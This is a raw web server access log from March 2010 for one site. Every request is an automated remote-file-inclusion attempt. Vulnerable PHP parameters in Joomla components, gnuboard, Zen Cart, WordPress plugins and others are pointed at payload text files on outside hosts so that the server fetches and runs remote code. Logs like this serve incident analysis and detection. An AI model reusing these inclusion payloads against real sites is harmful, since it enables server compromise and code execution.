70.86.52.250 - - [01/Mar/2010:10:25:26 -0800] "GET /logs/access_100211.log%20%20/index.php?sayfa=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:10:25:26 -0800] "GET /index.php?sayfa=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:10:25:38 -0800] "GET /logs/access_100211.log%20%20/index.php?sayfa=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:10:25:38 -0800] "GET /index.php?sayfa=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:10:25:38 -0800] "GET /logs/index.php?sayfa=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:10:26:11 -0800] "GET /index.php?sayfa=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:10:26:12 -0800] "GET /logs/index.php?sayfa=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:10:26:12 -0800] "GET /logs/access_100211.log%20%20/index.php?sayfa=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:10:26:38 -0800] "GET /logs/index.php?sayfa=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:10:26:39 -0800] "GET /logs/access_100211.log%20%20/index.php?sayfa=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:10:26:39 -0800] "GET /index.php?sayfa=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:10:27:14 -0800] "GET /logs/access_100128.log%20%20/index.php?sayfa=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:10:27:32 -0800] "GET /logs/access_100128.log%20%20/index.php?sayfa=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:10:27:37 -0800] "GET /logs/access_100128.log%20%20/index.php?sayfa=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [01/Mar/2010:10:27:51 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [01/Mar/2010:10:27:51 -0800] "GET /logs/access_100206.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [01/Mar/2010:10:27:51 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [01/Mar/2010:10:27:52 -0800] "GET /logs/access_100203.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [01/Mar/2010:10:27:52 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [01/Mar/2010:10:27:52 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [01/Mar/2010:10:27:53 -0800] "GET /logs/access_100206.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [01/Mar/2010:10:27:54 -0800] "GET /logs/access_100203.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [01/Mar/2010:10:27:54 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [01/Mar/2010:10:27:55 -0800] "GET /logs/access_100206.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [01/Mar/2010:10:27:55 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [01/Mar/2010:10:27:56 -0800] "GET /logs/access_100203.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [01/Mar/2010:10:27:59 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [01/Mar/2010:10:27:59 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [01/Mar/2010:10:28:00 -0800] "GET /logs/access_100206.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [01/Mar/2010:10:28:01 -0800] "GET /logs/access_100203.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [01/Mar/2010:10:28:04 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [01/Mar/2010:10:28:04 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [01/Mar/2010:10:28:05 -0800] "GET /logs/access_100206.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [01/Mar/2010:10:28:06 -0800] "GET /logs/access_100203.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [01/Mar/2010:10:28:08 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [01/Mar/2010:10:28:08 -0800] "GET /logs/access_100206.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [01/Mar/2010:10:28:08 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [01/Mar/2010:10:28:09 -0800] "GET /logs/access_100203.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
199.120.90.223 - - [01/Mar/2010:10:28:50 -0800] "GET /logs/access_100123.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geo.metodist.ru/images/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
199.120.90.223 - - [01/Mar/2010:10:28:51 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geo.metodist.ru/images/id? HTTP/1.1" 200 3642 "-" "libwww-perl/5.812" "www.puaga.com"
199.120.90.223 - - [01/Mar/2010:10:28:51 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geo.metodist.ru/images/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
218.55.227.132 - - [01/Mar/2010:10:29:18 -0800] "GET /logs/access_100123.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geo.metodist.ru/images/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
218.55.227.132 - - [01/Mar/2010:10:29:19 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geo.metodist.ru/images/id? HTTP/1.1" 200 3642 "-" "libwww-perl/5.805" "www.puaga.com"
218.55.227.132 - - [01/Mar/2010:10:29:19 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geo.metodist.ru/images/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
218.55.227.132 - - [01/Mar/2010:10:29:20 -0800] "GET /logs/access_100209.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geo.metodist.ru/images/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
199.120.90.223 - - [01/Mar/2010:10:29:26 -0800] "GET /logs/access_100209.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geo.metodist.ru/images/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:10:30:35 -0800] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:10:30:35 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:10:30:36 -0800] "GET /logs/access_100123.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:10:32:52 -0800] "GET /logs/access_100205.log///gnuboard4//bbs//delete_all.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:10:33:07 -0800] "GET /logs/access_100203.log///gnuboard4//bbs//delete_all.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:10:33:24 -0800] "GET /logs/access_100205.log///gnuboard4//bbs//delete_all.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:10:33:34 -0800] "GET /logs/access_100203.log///gnuboard4//bbs//delete_all.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
199.120.90.223 - - [01/Mar/2010:10:33:38 -0800] "GET /logs/access_100123.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geo.metodist.ru/images/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
199.120.90.223 - - [01/Mar/2010:10:33:39 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geo.metodist.ru/images/id? HTTP/1.1" 200 3642 "-" "libwww-perl/5.812" "www.puaga.com"
199.120.90.223 - - [01/Mar/2010:10:33:39 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geo.metodist.ru/images/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
124.136.23.172 - - [01/Mar/2010:10:33:48 -0800] "GET /logs/access_100207.log%20%20/phphtml.php?htmlclass_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [01/Mar/2010:10:33:48 -0800] "GET /phphtml.php?htmlclass_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [01/Mar/2010:10:33:48 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
199.120.90.223 - - [01/Mar/2010:10:34:04 -0800] "GET /logs/access_100209.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geo.metodist.ru/images/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:10:34:43 -0800] "GET /logs/access_100126.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:10:34:43 -0800] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:10:34:46 -0800] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.131.81 - - [01/Mar/2010:10:35:18 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.131.81 - - [01/Mar/2010:10:35:18 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.131.81 - - [01/Mar/2010:10:35:18 -0800] "GET /logs/access_100126.log%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [01/Mar/2010:10:35:38 -0800] "GET /logs/access_100130.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [01/Mar/2010:10:35:48 -0800] "GET /logs/access_100126.log%20%20/phphtml.php?htmlclass_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [01/Mar/2010:10:36:03 -0800] "GET /logs/access_100213.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:10:36:05 -0800] "GET /logs/access_100208.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:10:36:05 -0800] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
199.120.90.223 - - [01/Mar/2010:10:36:11 -0800] "GET /logs/access_100130.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geo.metodist.ru/images/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:10:36:19 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [01/Mar/2010:10:37:08 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:10:38:29 -0800] "GET /logs////write_comment_update.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:10:38:29 -0800] "GET /logs/access_100217.log////write_comment_update.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [01/Mar/2010:10:38:41 -0800] "GET /logs/access_100126.log/phphtml.php?htmlclass_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:10:40:34 -0800] "GET /logs/access_100211.log/index.php?sayfa=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:10:40:34 -0800] "GET /logs/access_100128.log/index.php?sayfa=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [01/Mar/2010:10:41:32 -0800] "GET /logs/access_100208.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:10:41:33 -0800] "GET /logs/access_100211.log/index.php?sayfa=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:10:42:29 -0800] "GET /logs/access_100128.log/index.php?sayfa=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [01/Mar/2010:10:42:33 -0800] "GET /logs/access_100213.log%20%20//bbs///////write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [01/Mar/2010:10:42:33 -0800] "GET /bbs///////write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [01/Mar/2010:10:42:33 -0800] "GET /logs//bbs///////write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [01/Mar/2010:10:42:33 -0800] "GET /logs/access_100221.log%20%20//bbs///////write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:10:43:06 -0800] "GET /logs/access_100211.log/index.php?sayfa=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:10:43:53 -0800] "GET /logs/access_100211.log/index.php?sayfa=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:10:43:54 -0800] "GET /logs/access_100209.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [01/Mar/2010:10:43:58 -0800] "GET /logs/access_100128.log/index.php?sayfa=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:10:44:01 -0800] "GET /logs/access_100130.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:10:46:09 -0800] "GET /logs/access_100123.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:10:46:09 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:10:46:09 -0800] "GET /logs/access_100209.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:10:46:10 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:10:46:50 -0800] "GET /logs//index.php?=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:10:46:50 -0800] "GET /logs/scripts.log%20%20//index.php?=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:10:46:50 -0800] "GET /index.php?=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
213.171.218.166 - - [01/Mar/2010:10:47:58 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.218.166 - - [01/Mar/2010:10:47:59 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.218.166 - - [01/Mar/2010:10:47:59 -0800] "GET /logs/access_100213.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.131.81 - - [01/Mar/2010:10:48:09 -0800] "GET /logs/access_100126.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [01/Mar/2010:10:48:21 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://bdkorea.org/zeroboard/data/bangla_notice/gh1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [01/Mar/2010:10:48:21 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://bdkorea.org/zeroboard/data/bangla_notice/gh1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [01/Mar/2010:10:48:21 -0800] "GET /logs/access_100125.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://bdkorea.org/zeroboard/data/bangla_notice/gh1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.131.81 - - [01/Mar/2010:10:48:23 -0800] "GET /logs/access_100207.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.218.166 - - [01/Mar/2010:10:48:57 -0800] "GET /logs/access_100201.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.218.166 - - [01/Mar/2010:10:49:50 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.218.166 - - [01/Mar/2010:10:49:50 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.218.166 - - [01/Mar/2010:10:49:50 -0800] "GET /logs/access_100213.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.102.237.18 - - [01/Mar/2010:10:50:30 -0800] "GET /logs/access_100125.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://bdkorea.org/zeroboard/data/bangla_notice/gh1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.218.166 - - [01/Mar/2010:10:50:45 -0800] "GET /logs/access_100201.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:10:51:56 -0800] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:10:51:56 -0800] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:10:51:56 -0800] "GET /logs/access_100213.log%20%20//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.78.235.181 - - [01/Mar/2010:10:54:52 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
